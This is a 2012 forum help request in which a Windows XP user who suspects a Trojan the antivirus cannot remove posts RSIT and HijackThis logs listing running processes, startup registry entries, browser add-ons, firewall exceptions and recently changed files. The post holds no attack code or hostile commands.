Page 1 of 2

virus cannot be removed by the antivirus

Posted: 18 Jul 2012 13:20
by hunterwx
Hi everyone, I really need your advice. I don't know exactly what virus it is, but I can't remove it. It should be located somewhere in win32 and it's some kind of Trojan horse, but I don't know exactly which one. I'm attaching the RSIT log and asking for help. (Sorry, I'm new here; if I've broken any rule I apologise, it won't happen again.)

Logfile of random's system information tool 1.06 (written by random/random)
Run by Monička at 2012-07-18 14:19:03
Systém Microsoft Windows XP Professional Service Pack 3
System drive C: has 16 GB (11%) free of 150 GB
Total RAM: 2046 MB (48% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 13:05:38, on 18.7.2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\BricoPacks\Vista Inspirat 2\RocketDock\RocketDock.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe
C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
C:\Program Files\ICQ6Toolbar\ICQ Service.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\msiexec.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\ICQ7.4\ICQ.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Monička\Desktop\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.sk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: ICQToolBar - {855F3B16-6D32-4fe6-8A56-BBB695989046} - C:\Program Files\ICQ6Toolbar\ICQToolBar.dll
O2 - BHO: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O2 - BHO: MegaIEMn - {bf00e119-21a3-4fd1-b178-3b8537e75c92} - C:\Program Files\Megaupload\Mega Manager\MegaIEMn.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: ICQToolBar - {855F3B16-6D32-4fe6-8A56-BBB695989046} - C:\Program Files\ICQ6Toolbar\ICQToolBar.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKCU\..\Run: [NBJ] "C:\Program Files\Ahead\Nero BackItUp\NBJ.exe"
O4 - HKCU\..\Run: [AlcoholAutomount] "C:\Program Files\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe" -automount
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: RocketDock.lnk = C:\WINDOWS\BricoPacks\Vista Inspirat 2\RocketDock\RocketDock.exe
O4 - Startup: TransBar.lnk = C:\WINDOWS\BricoPacks\Vista Inspirat 2\TransBar\TransBar.exe
O4 - Startup: Yahoo! Widgets.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe
O8 - Extra context menu item: E&xportovať do programu Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Odoslať do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Od&oslať do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: ICQ7.4 - {73C6DCFB-B606-47F3-BDFA-9A4FBF931E37} - C:\Program Files\ICQ7.4\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ7.4 - {73C6DCFB-B606-47F3-BDFA-9A4FBF931E37} - C:\Program Files\ICQ7.4\ICQ.exe
O9 - Extra button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra 'Tools' menuitem: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Monička\Start Menu\Programs\IMVU\Run IMVU.lnk
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Program Files\ICQ6.5\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Program Files\ICQ6.5\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: Firebird Guardian - DefaultInstance (FirebirdGuardianDefaultInstance) - FirebirdSQL Project - C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe
O23 - Service: Firebird Server - DefaultInstance (FirebirdServerDefaultInstance) - FirebirdSQL Project - C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe
O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: ICQ Service - Unknown owner - C:\Program Files\ICQ6Toolbar\ICQ Service.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
O23 - Service: StarWind AE Service (StarWindServiceAE) - StarWind Software - C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe

--
End of file - 10229 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\Adobe Flash Player Updater.job
C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
C:\WINDOWS\tasks\Scheduled Update for Ask Toolbar.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26 2217832]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre6\bin\ssv.dll [2011-11-10 325408]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Windows Live ID Sign-in Helper - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18 403840]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Browser Helper - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2011-10-10 3834016]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{bf00e119-21a3-4fd1-b178-3b8537e75c92}]
IeMonitorBho Class - C:\Program Files\Megaupload\Mega Manager\MegaIEMn.dll [2011-07-26 109568]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2011-11-10 42272]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2011-11-10 79648]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E99421FB-68DD-40F0-B4AC-B7027CAE2F1A}]
EpsonToolBandKicker Class - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll [2005-02-22 368640]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{EE5D279F-081B-4404-994D-C6B60AAEBA6D} - EPSON Web-To-Page - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll [2005-02-22 368640]
{855F3B16-6D32-4fe6-8A56-BBB695989046} - ICQToolBar - C:\Program Files\ICQ6Toolbar\ICQToolBar.dll [2008-06-12 958712]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-09-11 13574144]
"nwiz"=nwiz.exe /install []
"GrooveMonitor"=C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [2009-02-26 30040]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"NeroFilterCheck"=C:\WINDOWS\system32\NeroCheck.exe [2001-07-09 155648]
"NvMediaCenter"=C:\WINDOWS\system32\NvMcTray.dll [2008-09-11 86016]
"SunJavaUpdateSched"=C:\Program Files\Common Files\Java\Java Update\jusched.exe [2011-06-09 254696]
"RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2008-02-13 16857600]
"egui"=C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2008-07-01 1447168]
"COMODO"=C:\Program Files\COMODO\COMODO GeekBuddy\CLPSLA.exe [2011-11-23 208184]
"CPA"=C:\Program Files\COMODO\COMODO GeekBuddy\VALA.exe [2011-11-23 182584]
"COMODO Internet Security"=C:\Program Files\COMODO\COMODO Internet Security\cfp.exe [2012-03-11 6749512]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"NBJ"=C:\Program Files\Ahead\Nero BackItUp\NBJ.exe [2005-09-16 1961984]
"AlcoholAutomount"=C:\Program Files\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [2010-08-20 33120]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LogMeIn Hamachi Ui]
C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [2012-06-27 1996200]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TBPanel]
C:\Program Files\Vtune\TBPanel.exe [2008-09-05 2154496]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WinampAgent]
C:\Program Files\Winamp\winampa.exe [2008-08-04 36352]

C:\Documents and Settings\Monička\Start Menu\Programs\Startup
Adobe Gamma.lnk - C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
RocketDock.lnk - C:\WINDOWS\BricoPacks\Vista Inspirat 2\RocketDock\RocketDock.exe
TransBar.lnk - C:\WINDOWS\BricoPacks\Vista Inspirat 2\TransBar\TransBar.exe
Yahoo! Widgets.lnk - C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLS"=" C:\WINDOWS\system32\guard32.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
C:\WINDOWS\system32\WgaLogon.dll [2001-10-26 3584]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26 2217832]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CLPSLS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CLPSLS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Hamachi2Svc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveAutoRun"=67108863
"NoDrives"=0
"NoDriveTypeAutoRun"=323

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"C:\Program Files\Microsoft Office\Office12\GROOVE.EXE"="C:\Program Files\Microsoft Office\Office12\GROOVE.EXE:*:Enabled:Microsoft Office Groove"
"C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE"="C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE:*:Enabled:Microsoft Office OneNote"
"C:\Program Files\Activision\Call of Duty 2\CoD2MP_s.exe"="C:\Program Files\Activision\Call of Duty 2\CoD2MP_s.exe:*:Enabled:CoD2MP_s"
"C:\Program Files\Bonjour\mDNSResponder.exe"="C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour"
"C:\WINDOWS\system32\PnkBstrA.exe"="C:\WINDOWS\system32\PnkBstrA.exe:*:Enabled:PnkBstrA"
"C:\WINDOWS\system32\PnkBstrB.exe"="C:\WINDOWS\system32\PnkBstrB.exe:*:Enabled:PnkBstrB"
"C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Dx9.exe"="C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Dx9.exe:*:Enabled:Assassin's Creed Dx9"
"C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Dx10.exe"="C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Dx10.exe:*:Enabled:Assassin's Creed Dx10"
"C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Launcher.exe"="C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Launcher.exe:*:Enabled:Assassin's Creed Update"
"C:\Program Files\Opera\opera.exe"="C:\Program Files\Opera\opera.exe:*:Enabled:Opera Internet Browser"
"C:\Program Files\SpacialAudio\SAMBC\SAMBC.exe"="C:\Program Files\SpacialAudio\SAMBC\SAMBC.exe:*:Enabled:SAMBC"
"C:\Program Files\TeamViewer\Version5\TeamViewer.exe"="C:\Program Files\TeamViewer\Version5\TeamViewer.exe:*:Enabled:Teamviewer Remote Control Application"
"C:\Program Files\VideoLAN\VLC\vlc.exe"="C:\Program Files\VideoLAN\VLC\vlc.exe:*:Enabled:VLC media player"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Java\jre6\bin\javaw.exe"="C:\Program Files\Java\jre6\bin\javaw.exe:*:Enabled:Java(TM) Platform SE binary"
"C:\Program Files\Ares\Ares.exe"="C:\Program Files\Ares\Ares.exe:*:Enabled:Ares p2p for windows"
"C:\totalcmd\TOTALCMD.EXE"="C:\totalcmd\TOTALCMD.EXE:*:Enabled:Total Commander 32 bit"
"C:\Program Files\ICQ7.4\ICQ.exe"="C:\Program Files\ICQ7.4\ICQ.exe:*:Enabled:ICQ7.4"
"C:\Program Files\ICQ6.5\ICQ.exe"="C:\Program Files\ICQ6.5\ICQ.exe:*:Enabled:ICQ6"
"D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\ACBSP.exe"="D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\ACBSP.exe:*:Enabled:Assassin's Creed Brotherhood"
"D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\ACBMP.exe"="D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\ACBMP.exe:*:Enabled:Assassin's Creed Brotherhood Multiplayer"
"D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\AssassinsCreedBrotherhood.exe"="D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\AssassinsCreedBrotherhood.exe:*:Enabled:Assassin's Creed Brotherhood Update"
"D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\UPlayBrowser.exe"="D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\UPlayBrowser.exe:*:Enabled:Assassin's Creed Brotherhood Uplay"
"C:\Program Files\Google\Google Earth\client\googleearth.exe"="C:\Program Files\Google\Google Earth\client\googleearth.exe:*:Enabled:Google Earth"
"C:\Program Files\TeamViewer\Version6\TeamViewer.exe"="C:\Program Files\TeamViewer\Version6\TeamViewer.exe:*:Enabled:Teamviewer Remote Control Application"
"C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe"="C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe:*:Enabled:Teamviewer Remote Control Service"
"D:\MY DOKUMENTS\Programs\SweetImSetup.exe"="D:\MY DOKUMENTS\Programs\SweetImSetup.exe:*:Enabled:SweetIM Installer"
"C:\Program Files\Winamp\winamp.exe"="C:\Program Files\Winamp\winamp.exe:*:Enabled:Winamp"
"C:\WINDOWS\system32\spool\drivers\w32x86\3\E_DUPA20.EXE"="C:\WINDOWS\system32\spool\drivers\w32x86\3\E_DUPA20.EXE:*:Enabled:EPSON Driver Update"
"C:\Program Files\Codemasters\F1 2011\F1_2011.exe"="C:\Program Files\Codemasters\F1 2011\F1_2011.exe:*:Enabled:F1 2011"
"C:\Program Files\Skype\Phone\Skype.exe"="C:\Program Files\Skype\Phone\Skype.exe:*:Enabled:Skype"
"C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe"="C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe:*:Enabled:LogMeIn Hamachi"
"C:\Program Files\Opera\pluginwrapper\opera_plugin_wrapper.exe"="C:\Program Files\Opera\pluginwrapper\opera_plugin_wrapper.exe:*:Enabled:Opera Internet Browser - Plugin wrapper"
"C:\Program Files\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe"="C:\Program Files\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe:*:Enabled:Ubisoft Game Launcher"
"C:\Program Files\Ubisoft\Assassin's Creed Revelations\ACRSP.exe"="C:\Program Files\Ubisoft\Assassin's Creed Revelations\ACRSP.exe:*:Enabled:Assassin's Creed Revelations"
"C:\Program Files\Ubisoft\Assassin's Creed Revelations\ACRMP.exe"="C:\Program Files\Ubisoft\Assassin's Creed Revelations\ACRMP.exe:*:Enabled:Assassin's Creed Revelations Multiplayer"
"C:\Program Files\Ubisoft\Assassin's Creed Revelations\AssassinsCreedRevelations.exe"="C:\Program Files\Ubisoft\Assassin's Creed Revelations\AssassinsCreedRevelations.exe:*:Enabled:Assassin's Creed Revelations Update"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\ICQ7.4\ICQ.exe"="C:\Program Files\ICQ7.4\ICQ.exe:*:Enabled:ICQ7.4"

======List of files/folders created in the last 1 months======

2012-07-18 14:19:03 ----D---- C:\rsit
2012-07-18 13:16:33 ----D---- C:\Documents and Settings\All Users\Application Data\CPA_VA
2012-07-18 13:12:15 ----D---- C:\Documents and Settings\All Users\Application Data\Comodo
2012-07-18 13:12:08 ----D---- C:\Program Files\COMODO
2012-07-18 13:12:08 ----A---- C:\WINDOWS\system32\gdiplus.dll
2012-07-18 12:56:55 ----SHD---- C:\RECYCLER
2012-07-18 12:13:19 ----A---- C:\WINDOWS\system32\FlashPlayerInstaller.exe
2012-07-18 11:58:00 ----A---- C:\ComboFix.txt
2012-07-18 11:57:56 ----A---- C:\WINDOWS\SchedLgU.Txt
2012-07-18 11:00:36 ----D---- C:\ComboFix
2012-07-11 17:20:13 ----DC---- C:\WINDOWS\$NtUninstallKB2691442$
2012-07-11 17:20:08 ----DC---- C:\WINDOWS\$NtUninstallKB2718523$
2012-07-11 17:19:24 ----DC---- C:\WINDOWS\$NtUninstallKB2655992$
2012-07-11 17:18:34 ----DC---- C:\WINDOWS\$NtUninstallKB2719985$
2012-07-11 17:16:48 ----DC---- C:\WINDOWS\$NtUninstallKB2698365$

======List of files/folders modified in the last 1 months======

2012-07-18 14:19:11 ----D---- C:\WINDOWS\temp
2012-07-18 13:53:31 ----D---- C:\Program Files\Mozilla Firefox
2012-07-18 13:47:20 ----D---- C:\Program Files\DontAngry!
2012-07-18 13:22:47 ----SHD---- C:\WINDOWS\Installer
2012-07-18 13:16:02 ----D---- C:\WINDOWS\system32\CatRoot2
2012-07-18 13:15:54 ----D---- C:\WINDOWS
2012-07-18 13:15:16 ----D---- C:\WINDOWS\system32\drivers
2012-07-18 13:13:22 ----D---- C:\Config.Msi
2012-07-18 13:12:20 ----D---- C:\WINDOWS\system32
2012-07-18 13:12:08 ----D---- C:\Program Files
2012-07-18 12:59:50 ----HD---- C:\WINDOWS\inf
2012-07-18 12:57:56 ----D---- C:\WINDOWS\SoftwareDistribution
2012-07-18 12:57:33 ----D---- C:\Documents and Settings\Monička\Application Data\Winamp
